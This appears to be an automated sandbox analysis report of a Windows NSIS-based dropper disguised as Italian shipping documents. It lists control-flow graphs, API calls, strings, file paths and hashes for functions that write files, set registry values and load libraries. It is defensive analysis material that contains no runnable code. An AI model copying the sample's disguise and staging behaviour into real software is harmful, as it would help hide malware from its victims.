                                                  • Instruction Fuzzy Hash: 4671D071A00204ABDB20DFA4DD86BAE3EACAB04715F20457FE915B72C1CB789F418B5C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 583 4066df-4066e8 584 4066ea-4066f9 583->584 585 4066fb-406715 583->585 584->585 586 406925-40692b 585->586 587 40671b-406727 585->587 589 406931-40693e 586->589 590 406739-406746 586->590 587->586 588 40672d-406734 587->588 588->586 591 406940-406945 call 4066a2 589->591 592 40694a-40694d 589->592 590->589 593 40674c-406755 590->593 591->592 595 406912 593->595 596 40675b-40679e 593->596 597 406920-406923 595->597 598 406914-40691e 595->598 599 4067a4-4067b0 596->599 600 4068b6-4068ba 596->600 597->586 598->586 601 4067b2 599->601 602 4067ba-4067bc 599->602 603 4068bc-4068c3 600->603 604 4068ee-4068f2 600->604 601->602 607 4067f6-4067f9 602->607 608 4067be-4067e4 call 406570 602->608 605 4068d3-4068df call 4066a2 603->605 606 4068c5-4068d1 call 4065e9 603->606 609 406902-406910 lstrlenW 604->609 610 4068f4-4068fd call 4066df 604->610 619 4068e4-4068ea 605->619 606->619 614 4067fb-406807 GetSystemDirectoryW 607->614 615 40680c-40680f 607->615 623 4067ea-4067f1 call 4066df 608->623 624 40689e-4068a1 608->624 609->586 610->609 620 406899-40689c 614->620 621 406821-406825 615->621 622 406811-40681d GetWindowsDirectoryW 615->622 619->609 625 4068ec 619->625 620->624 626 4068ae-4068b4 call 406950 620->626 621->620 627 406827-406845 621->627 622->621 623->620 624->626 629 4068a3-4068a9 lstrcatW 624->629 625->626 626->609 631 406847-40684d 627->631 632 406859-406871 call 406a96 627->632 629->626 637 406855-406857 631->637 640 406873-406886 SHGetPathFromIDListW CoTaskMemFree 632->640 641 406888-406891 632->641 637->632 638 406893-406897 637->638 638->620 640->638 640->641 641->627 641->638
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406801
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406875
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                  • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-1230650788
                                                  • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction ID: c05bc8db6a500faa8ceae89892d654845b9b7d80f8daaf315b7a9d2c48b59061
                                                  • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction Fuzzy Hash: CE6147B2A053019BEB20AF24DC84B6B77D8AF54314F26453FF587B26D0DA3C8961875E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 642 401794-4017b9 call 402dcb call 405fe8 647 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 642->647 648 4017bb-4017c1 call 4066a2 642->648 653 4017da-4017db call 406950 647->653 648->653 657 4017e0-4017e4 653->657 658 4017e6-4017f0 call 4069ff 657->658 659 401817-40181a 657->659 667 401802-401814 658->667 668 4017f2-401800 CompareFileTime 658->668 660 401822-40183e call 406192 659->660 661 40181c-40181d call 40616d 659->661 669 401840-401843 660->669 670 4018b2-4018db call 405727 call 403396 660->670 661->660 667->659 668->667 671 401894-40189e call 405727 669->671 672 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 669->672 684 4018e3-4018ef SetFileTime 670->684 685 4018dd-4018e1 670->685 682 4018a7-4018ad 671->682 672->657 704 401889-40188a 672->704 687 402c58 682->687 686 4018f5-401900 CloseHandle 684->686 685->684 685->686 689 401906-401909 686->689 690 402c4f-402c52 686->690 691 402c5a-402c5e 687->691 693 40190b-40191c call 4066df lstrcatW 689->693 694 40191e-401921 call 4066df 689->694 690->687 700 401926-4023bd 693->700 694->700 705 4023c2-4023c7 700->705 706 4023bd call 405d02 700->706 704->682 707 40188c-40188d 704->707 705->691 706->705 707->671
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Premolder\Mokl,?,?,00000031), ref: 004017D5
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Premolder\Mokl,?,?,00000031), ref: 004017FA
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,Civilisere Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso28B6.tmp$C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dll$C:\Users\user\AppData\Roaming\Premolder\Mokl$Call
                                                  • API String ID: 1941528284-3732926614
                                                  • Opcode ID: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction ID: adf8bb8e975ebc770d7c27afbe064fe35cfd0cbf1071ecc95f96a86e7a4b9e55
                                                  • Opcode Fuzzy Hash: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction Fuzzy Hash: 8A41C671900105BACF117BA5CD85DAE3A79EF45368F21823FF422B10E1D73D8E91AA2D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 708 402711-40272a call 402da9 711 402730-402737 708->711 712 402c4f-402c52 708->712 713 402739 711->713 714 40273c-40273f 711->714 715 402c58-402c5e 712->715 713->714 716 4028a3-4028ab 714->716 717 402745-402754 call 406602 714->717 716->712 717->716 721 40275a 717->721 722 402760-402764 721->722 723 4027f9-4027fc 722->723 724 40276a-402785 ReadFile 722->724 725 402814-402824 call 406215 723->725 726 4027fe-402801 723->726 724->716 727 40278b-402790 724->727 725->716 735 402826 725->735 726->725 729 402803-40280e call 406273 726->729 727->716 728 402796-4027a4 727->728 731 4027aa-4027bc MultiByteToWideChar 728->731 732 40285f-40286b call 4065e9 728->732 729->716 729->725 731->735 736 4027be-4027c1 731->736 732->715 741 402829-40282c 735->741 739 4027c3-4027ce 736->739 739->741 743 4027d0-4027f5 SetFilePointer MultiByteToWideChar 739->743 741->732 742 40282e-402833 741->742 744 402870-402874 742->744 745 402835-40283a 742->745 743->739 746 4027f7 743->746 748 402891-40289d SetFilePointer 744->748 749 402876-40287a 744->749 745->744 747 40283c-40284f 745->747 746->735 747->716 750 402851-402857 747->750 748->716 751 402882-40288f 749->751 752 40287c-402880 749->752 750->722 753 40285d 750->753 751->716 752->748 752->751 753->716
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                    • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                  • Instruction ID: 77fbecb4268093b3ffff8c623a80bd5bb6512b600f7762490a4bde5bc174ce64
                                                  • Opcode Fuzzy Hash: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                  • Instruction Fuzzy Hash: 9A511D75D04219AADF20EFD4CA85AAEBB79FF44304F14817BE501B62D0D7B89D82CB58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 754 40349e-4034c6 GetTickCount 755 4035f6-4035fe call 403053 754->755 756 4034cc-4034f7 call 40361d SetFilePointer 754->756 761 403600-403604 755->761 762 4034fc-40350e 756->762 763 403510 762->763 764 403512-403520 call 403607 762->764 763->764 767 403526-403532 764->767 768 4035e8-4035eb 764->768 769 403538-40353e 767->769 768->761 770 403540-403546 769->770 771 403569-403585 call 406c11 769->771 770->771 773 403548-403568 call 403053 770->773 777 4035f1 771->777 778 403587-40358f 771->778 773->771 779 4035f3-4035f4 777->779 780 403591-403599 call 406244 778->780 781 4035b2-4035b8 778->781 779->761 784 40359e-4035a0 780->784 781->777 783 4035ba-4035bc 781->783 783->777 785 4035be-4035d1 783->785 786 4035a2-4035ae 784->786 787 4035ed-4035ef 784->787 785->762 788 4035d7-4035e6 SetFilePointer 785->788 786->769 789 4035b0 786->789 787->779 788->755 789->785
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004034B2
                                                    • Part of subcall function 0040361D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                  • SetFilePointer.KERNELBASE(000059B4,00000000,00000000,00414EF0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID: )2$@
                                                  • API String ID: 1092082344-3125103249
                                                  • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                  • Instruction ID: f81ac03ea206090be76b65a385b2ac7d4b581aa0cbae2b80a2d2021fe8c89915
                                                  • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                  • Instruction Fuzzy Hash: 7E319CB2600201EFC7209F29EE859263FA9F740356B55023BF901B22F1CBB59E41DB9C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 790 406a26-406a46 GetSystemDirectoryW 791 406a48 790->791 792 406a4a-406a4c 790->792 791->792 793 406a5d-406a5f 792->793 794 406a4e-406a57 792->794 796 406a60-406a93 wsprintfW LoadLibraryExW 793->796 794->793 795 406a59-406a5b 794->795 795->796
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                  • wsprintfW.USER32 ref: 00406A78
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                  • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 797 73d81817-73d81856 call 73d81bff 801 73d8185c-73d81860 797->801 802 73d81976-73d81978 797->802 803 73d81869-73d81876 call 73d82480 801->803 804 73d81862-73d81868 call 73d8243e 801->804 809 73d81878-73d8187d 803->809 810 73d818a6-73d818ad 803->810 804->803 813 73d81898-73d8189b 809->813 814 73d8187f-73d81880 809->814 811 73d818cd-73d818d1 810->811 812 73d818af-73d818cb call 73d82655 call 73d81654 call 73d81312 GlobalFree 810->812 815 73d8191e-73d81924 call 73d82655 811->815 816 73d818d3-73d8191c call 73d81666 call 73d82655 811->816 837 73d81925-73d81929 812->837 813->810 817 73d8189d-73d8189e call 73d82e23 813->817 819 73d81888-73d81889 call 73d82b98 814->819 820 73d81882-73d81883 814->820 815->837 816->837 830 73d818a3 817->830 833 73d8188e 819->833 825 73d81890-73d81896 call 73d82810 820->825 826 73d81885-73d81886 820->826 836 73d818a5 825->836 826->810 826->819 830->836 833->830 836->810 840 73d8192b-73d81939 call 73d82618 837->840 841 73d81966-73d8196d 837->841 847 73d8193b-73d8193e 840->847 848 73d81951-73d81958 840->848 841->802 843 73d8196f-73d81970 GlobalFree 841->843 843->802 847->848 850 73d81940-73d81948 847->850 848->841 849 73d8195a-73d81965 call 73d815dd 848->849 849->841 850->848 852 73d8194a-73d8194b FreeLibrary 850->852 852->848
                                                  APIs
                                                    • Part of subcall function 73D81BFF: GlobalFree.KERNEL32(?), ref: 73D81E74
                                                    • Part of subcall function 73D81BFF: GlobalFree.KERNEL32(?), ref: 73D81E79
                                                    • Part of subcall function 73D81BFF: GlobalFree.KERNEL32(?), ref: 73D81E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D818C5
                                                  • FreeLibrary.KERNEL32(?), ref: 73D8194B
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D81970
                                                    • Part of subcall function 73D8243E: GlobalAlloc.KERNEL32(00000040,?), ref: 73D8246F
                                                    • Part of subcall function 73D82810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73D81896,00000000), ref: 73D828E0
                                                    • Part of subcall function 73D81666: wsprintfW.USER32 ref: 73D81694
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 2f5e0919a5eaf17bb7e662121caa081a1f3438c86323fb25a2b09b411524ee05
                                                  • Instruction ID: d3a2b3ce876499ca71e0dbf2f13c9d4669bab2fb346b8aa7a1a2f8304bc3819a
                                                  • Opcode Fuzzy Hash: 2f5e0919a5eaf17bb7e662121caa081a1f3438c86323fb25a2b09b411524ee05
                                                  • Instruction Fuzzy Hash: 2441B3B2400305ABDB01AF34D989BD937BCAF05720F184465E95BBA0C6EB7CB08D8770

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 854 4024af-4024e0 call 402dcb * 2 call 402e5b 861 4024e6-4024f0 854->861 862 402c4f-402c5e 854->862 863 4024f2-4024ff call 402dcb lstrlenW 861->863 864 402503-402506 861->864 863->864 867 402508-402519 call 402da9 864->867 868 40251a-40251d 864->868 867->868 872 40252e-402542 RegSetValueExW 868->872 873 40251f-402529 call 403396 868->873 876 402544 872->876 877 402547-402628 RegCloseKey 872->877 873->872 876->877 877->862
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000023,00000011,00000002), ref: 004024FA
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,00000011,00000002), ref: 0040253A
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso28B6.tmp
                                                  • API String ID: 2655323295-3993855157
                                                  • Opcode ID: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                  • Instruction ID: bf0ef5d62df918b2bfabe39acf8ac680016d82ecec6d2e1c9a4cf4f2d71e963b
                                                  • Opcode Fuzzy Hash: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                  • Instruction Fuzzy Hash: 2911A231D00115BEEB10AFA58E4AAAEB6B4EB44318F21443FF404B71D1C7B88E419668

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 879 4061c1-4061cd 880 4061ce-406202 GetTickCount GetTempFileNameW 879->880 881 406211-406213 880->881 882 406204-406206 880->882 884 40620b-40620e 881->884 882->880 883 406208 882->883 883->884
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004061DF
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403663,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F), ref: 004061FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1857211195
                                                  • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                  • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 969 4015e6-4015fa call 402dcb call 40601c 974 401656-401659 969->974 975 4015fc-40160f call 405f9e 969->975 977 401688-40231b call 401423 974->977 978 40165b-40167a call 401423 call 4066a2 SetCurrentDirectoryW 974->978 983 401611-401614 975->983 984 401629-40162c call 405c50 975->984 990 402c4f-402c5e 977->990 978->990 996 401680-401683 978->996 983->984 987 401616-40161d call 405c6d 983->987 993 401631-401633 984->993 987->984 1001 40161f-401622 call 405bf6 987->1001 997 401635-40163a 993->997 998 40164c-401654 993->998 996->990 999 401649 997->999 1000 40163c-401647 GetFileAttributesW 997->1000 998->974 998->975 999->998 1000->998 1000->999 1004 401627 1001->1004 1004->993
                                                  APIs
                                                    • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 0040602A
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                    • Part of subcall function 00405BF6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
